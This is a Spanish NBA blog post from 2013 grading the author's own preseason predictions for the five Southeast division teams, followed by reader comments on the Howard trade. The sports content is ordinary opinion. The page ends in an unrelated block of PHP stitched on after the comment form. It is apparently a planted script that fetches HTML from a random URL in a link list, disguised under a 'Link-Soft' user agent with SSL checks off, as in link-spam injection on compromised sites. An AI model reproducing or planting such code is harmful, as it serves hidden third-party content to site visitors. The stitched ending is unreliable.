Revisando los pronósticos 2013: Southeast

05 de March de 2013 por TheDeerHunter

MIAMI HEAT

Análisis
Pronóstico:
58-24. Primeros o segundos de Conferencia y Campeones de la NBA 2012-2013.
Probabilidad de acierto: Alta
Calificación pronóstico: A

No es el colmo de la audacia decir que los Heat quedarían primeros o segundos del Este. Tenía algo más de mérito apostar tan claramente por el anillo en un momento en que el big four de Lakers prometía comerse el mundo. Precisar un 58-24 es rizar el rizo. La proyección ahora mismo ronda esos números, con dos o tres victorias de cota de error por exceso a su favor.

“Primus inter pares” titulábamos. El entusiasta alegato que ofrecimos sobre la grandeza de LeBron parece quedarse corto en estos momentos. En el mejor momento de su carrera mira a la cara a cualquiera. Liberado de las cargas de antaño asombra al mundo con una eficacia devastadora. Todo con pasmosa sencillez. No olvidemos que esto, simplemente, es la temporada regular. Lo mismo cuando lleguen las eliminatorias se motiva todavía más. La pleitesía que rinde la liga a los Heat (exceptuando a la división Central) viene motivada por la incapacidad de todos para frenar a LeBron.

Por su parte Wade y Bosh han sufrido mayores críticas que nunca. Si bien uno y otro han reducido en términos absolutos números y presencia, los dos han mejorado en efectividad. Ray Allen también ha cumplido, aunque a partir de ahí no crece la hierba. Miami puede necesitar más contribución de la intendencia en los cruces. Son el peor equipo en rebotes de la liga y eso puede ser un factor determinante. Además, los resultados lejos del American Airlines bajan significativamente.

Con todo, son los campeones y, mientras no se demuestre lo contrario, el equipo a batir, con el mejor del mundo a la cabeza. Nuestro pronóstico de que ganarán el anillo tiene tanta vigencia ahora como entonces.

ATLANTA HAWKS

Análisis
Pronóstico:
50% victorias. 7ª-8ª plaza del Este y eliminados en primera ronda.
Probabilidad de acierto: Media-baja.
Calificación pronóstico: C-

Un simple vistazo a la tabla clasificatoria indica a priori que no estuvimos demasiado finos en nuestras predicciones. Lejos de rebajar significativamente su balance de victorias, están firmando una notable campaña, rondando la parte alta del cuadro e incluso mostrándose por momentos tanto o más sólidos que durante años precedentes.

La otra lectura, donde no hubiéramos ido tan desencaminados, es que han salido muy beneficiados por pertenecer a la Southwest. Su balance queda algo maquillado por su solvencia ante equipos perdedores, buena parte de ellos vecinos de división. La impresión es que no termina de verse la línea a seguir, con asuntos clave por resolver como la cada día más remota renovación de Josh Smith. Tampoco van a tener nada fácil superar esa primera ronda que marcábamos como techo en su día.

En definitiva hemos visto aspectos que invitan al optimismo como ha sido la dirección de Jeff Teague o el acierto del fichaje de Louis Williams pero la salida de Josh Smith supondrá otro inevitable paso atrás. Nunca es fácil mantener la competitividad año a año perdiendo piezas importantes. Veremos si los Hawks están en condiciones de lograrlo.

WASHINGTON WIZARDS

Análisis
Pronóstico:
36-47. Fuera de playoffs.
Probabilidad de acierto: Baja.
Calificación pronóstico: C-

De forma similar al caso anterior el balance de algo más del 30% de victorias no invita a compartir los relativos buenos ojos con los que les veíamos nosotros en Septiembre. Hay que decir que de acercarse a ese 60% que han rondado las últimas semanas el balance final se acercaría mucho al que pronosticamos y en ese caso hablaríamos de un gran acierto por nuestra parte.

Más allá de los resultados concretos, alterados significativamente por un importante número de lesiones, hay que destacar ese carácter defensivo que se ha imprimido con éxito al equipo. Es algo que mencionábamos como clave al principio de curso y es una importante mejora de cara al año que viene, que esperemos que no sea tan desgraciado como éste. El juego ofensivo, sin embargo, hay que calificarlo con un “necesita mejorar” siendo generosos, ya que durante demasiado tiempo se ha basado casi exclusivamente en lo que pudieran cocinarse Jordan Crawford y el rookie Bradley Beal. Ahora con todos los efectivos la cosa ha cambiado bastante.

Eso sí, de lo que no nos salva nadie es de nuestra equivocada percepción de Vesely. Absoluta calamidad, carne de vuelta a Europa de no obrarse milagro. “Pinta de jugón”… en el fondo del banquillo no se aprecia. ¿Candidato a MIP? Si acaso a Mayor Internacional Pakete.

ORLANDO MAGIC

Análisis
Pronóstico:
Últimos.
Probabilidad de acierto: Media.
Calificación: B+

No van los últimos, cierto. Tampoco tienen pinta de quedarse con la cuchara de madera tal y como están en Charlotte, aunque también depende de cómo planteen unos y otros “el dejarse llevar” típico de fin de curso en aquellos que durante muchas semanas no se juegan nada más que la honrilla o el pick 1 del próximo draft. A gusto de cada uno.

A pesar de ese detalle irrelevante nuestro análisis tenía más de cierto que de otra cosa y no es que nos alegremos. Ya advertimos que por momentos Orlando podía poner en liza peor equipo que los Bobcats del año pasado. Efectivamente el día de los fatídicos 61 puntos ante los Sixers alineaban a Ish Smith, Moore, Harkless, McRoberts, Vucevic y en el banco O’Quinn, Nicholson, Ayon y un Turkoglu que ni hasta las cejas de barbitúricos daba una a derechas. Es sólo un ejemplo del nivel del grueso de la plantilla y una imagen de lo mal que se han hecho las cosas durante los últimos tiempos en Florida.

Como decimos no nos alegramos porque el hecho es que le han echado pundonor mientras la salud lo permitió y aún se atreven a disputar alguna que otra victoria con básicamente lo puesto. Más que digna campaña de Afflalo, Nelson, Davis, Vucevic, Nicholson… y mientras estuvo, de Reddick como ahora de Harris. En realidad no ha sido la calamidad que refleja su balance pero con un equipo tan limitado había muchos números de así terminara. Lo malo es que tampoco hay demasiados detalles para el optimismo de cara inmediatamente al próximo curso.

CHARLOTTE BOBCATS

Análisis
Pronóstico:
15-67.
Probabilidad de acierto: Media.
Calificación: A

La cabra tira al monte y a pesar del espejismo de las primeras semanas no hay quien gane a los Bobcats en incapacidad. El purgatorio, que decía Sancho, va a continuar otro año más con el más que probable farolillo rojo. Y lo que te rondaré morena, porque el final del túnel aún no se vislumbra.

Los Bobcats son de lo más malo que hay en casi todo. En puntos anotados, encajados, rebotes, asistencias… En cualquier aspecto medible que se os ocurra allí estarán ellos, moviéndose alegremente por las últimas plazas.

Mimbres muy limitados en la cancha, como también en los banquillos. Dunlap, “el cuarto plato” de los Sloan, Shaw y cuanto técnico de renombre hubiera sin equipo asignado, no ha conseguido cambiar un ápice la dinámica, aunque nos preguntamos quien hubiera sido el guapo que lo hubiera hecho.

En fin, a ver si este año tienen más suerte en la lotería… y no es que le estemos poniendo pegas al rendimiento de Kidd-Gildchrist.

Comenta

5 comentarios a esta entrada

  1. Esteban dice:
    #1

    sorprendente es la renovacion en el MAGIC, de no tener UN SOLO JOVEN SOBRE QUIEN APOSTAR, derepente cuentan con lamb, vucevic, Harkless, Nicholson y HARRIS,

    ninguno de estos tiene pinta de super estrella, pero todos tienen pinta de formar a futuro un dique solido y barato para rodear a dos jugadores de prestigio

    una buena para el magic el rendimiento der afflalo y davis, quienes pueden ser transfewridos facilmente a cambio de exepciones o expirings y que pronto terminan los contratos de turkoglu, harringon y nelson, lo que les dara espacio para sumar a esos jugaores de cierto prestigio que guien a los jovenes

    la reconstruccion puede no durar tanto a fin de cuentas

      Citar

  2. Denise dice:
    #2

    Yo sí soy optimista de cara al futuro de Orlando, y su reconstrucción para ser un equipo de la zona alta creo que va a ser mas rapida que la de otros equipos que llevan o se han pasado años sin oler Playoffs. La situación era poco flexible cuando cogió las riendas de la dirección el nuevo GM Rob Henningan, y el traspaso de Howard podía haber acabado como el mayor traspaso desastre de los últimos años, pero por unas cosas y otras, viendo el actual rendimiento de Howard, el no rendimiento de Bynum, y la eclosión de Vucevic más los rookies que pillaron en el trade, declaro a Orlando como ganador de ese traspaso a 4 bandas.
    Suponiendo que Turkoglu ejecutará su Player Option de 12 kilos, los Magic en teoría empezarán el año que viene por debajo del limite salarial (aunque cargando con los 22 kilos de Arenas) pero con una serie de jovenes (Vucevic, Harris, Nicholson, Harkless, Moore, un Top 5 del proximo Draft) que podrán rodear muy bien a los agentes libres que puedan ficharse este verano y sobre todo el próximo. Además, jugadores veteranos como Nelson o Afflalo que en un primer momento podrían desmotivarse, se les ha visto muy comprometidos con el equipo.
    A todo esto, no hay que olvidar que el balance tan malo que presenta Orlando es totalmente ficticio, entre sus en teoría 5 jugadores mas importantes (Harrington, Turkoglu, Nelson, Davis y Afflalo) se han perdido alrededor de 150 partidos por lesión.
    Viendo el nivel que tiene el Este, si el año que viene se mantiene igual, no descartaría que Orlando estuviese peleando por las ultimas plazas de Playoffs.

      Citar

  3. Sempren dice:
    #3

    Denise:
    y el traspaso de Howard podía haber acabado como el mayor traspaso desastre de los últimos años, pero por unas cosas y otras, viendo el actual rendimiento de Howard, el no rendimiento de Bynum, y la eclosión de Vucevic más los rookies que pillaron en el trade, declaro a Orlando como ganador de ese traspaso a 4 bandas.

    Di tú que hasta enero Iguodala no había hecho mucho, pero creo que esta época es más propicia para un animalico como él, y Denver quizá sea el ganador del trade (aunque también notaron la ausencia de un 4 con más calidad, Harrington estaría a medias entre Gallo y Faried, pero ahora con Chandler también mejoraron en la rotación)

      Citar

  4. Esteban dice:
    #4

    el mega traspaso, aunque sea por este año, ha sido un desastre practicamente para todos, en el futuro se vera

    a los lakers no les ha servido, bynum tenia mejores numeros y mejor rendimiento que howard el año pasado, al margen que este año se ha lesionado

    los 76ers perdieron a iguodala, a cambio de un bynum que no jugo ni un partido

    denver ni fu ni fa con la llegada de iguodala, mas de lo mismo, para mi gusto se podrian haber movido mejor

    orlando, con algo de futuro, pero poco en relacion de tener al mejor pivote de la nba

    un fiasco para todos

      Citar

  5. Jose Luis dice:
    #5

    Hombre Esteban los traspasos hay que verlos a corto y largo plazo según el caso:

    A corto pretendían ganar los Sixers, los Lakers y los Nuggets. En el corto solo han ganado los Nuggets creo aunque podrían haberse movido mejor como apuntas.

    En el largo si Bynum renueva y juega consistentemente, los Sixers habrán ganado. Lo mismo para los Lakers. Casi lo mismo para los Nuggets. Y Orlando seguramente habrá ganado porque Howard iba a irse libre y si bien en el corto han perdido en el largo han ganado bastante.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>